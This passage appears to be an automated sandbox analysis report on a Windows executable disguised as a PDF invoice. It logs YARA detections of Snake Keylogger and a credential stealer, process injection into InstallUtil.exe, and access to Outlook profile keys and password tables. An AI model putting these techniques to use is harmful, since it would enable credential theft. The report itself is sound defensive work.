                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061459313_2_06145931
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061459403_2_06145940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614B99A3_2_0614B99A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_061431A03_2_061431A0
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2220486792.0000000006380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHzebato.dll" vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2223096565.0000000006880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208812518.0000000002E85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2208256316.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000000.2036955882.0000000000754000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSrblwr.exe. vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeBinary or memory string: OriginalFilenameSrblwr.exe. vs FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3ce01d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.3c919b0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 5148, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@3/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: InstallUtil.exe, 00000003.00000002.3290810947.000000000378B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe "C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe"
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2223096565.0000000006880000.00000004.08000000.00040000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2223096565.0000000006880000.00000004.08000000.00040000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.65d0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.65d0000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2221534683.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2208812518.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe PID: 2924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_064957B5 push es; retf 0_2_064957B8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0649C569 push 900636B1h; retf 0_2_0649C575
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0649BD61 push es; retf 0_2_0649BD68
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065043F8 push es; iretd 0_2_06504454
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065044B9 push es; retf 0_2_065044BC
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065045E5 push es; iretd 0_2_06504604
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065CBD3F push es; iretd 0_2_065CBD54
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_065CEDC2 push esp; iretd 0_2_065CEDC9
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A3D41 push es; iretd 0_2_066A3D4C
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A3DFA push 00000006h; iretd 0_2_066A3EE0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_066A3DF2 push 00000006h; iretd 0_2_066A3EE0
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06755276 pushad ; retf 0_2_06755277
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_0675BC37 push es; iretd 0_2_0675BC38
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_06767751 push es; ret 0_2_06767760
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E97A8 pushad ; retf 0_2_068E97A9
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E7BF0 push esp; ret 0_2_068E7BF1
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_068E4502 push esp; ret 0_2_068E4511
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_069A3DAE push edi; ret 0_2_069A3DAF
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 0_2_069A35E6 push ss; retf 0_2_069A35E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0614D27A push ss; retf 3_2_0614D281
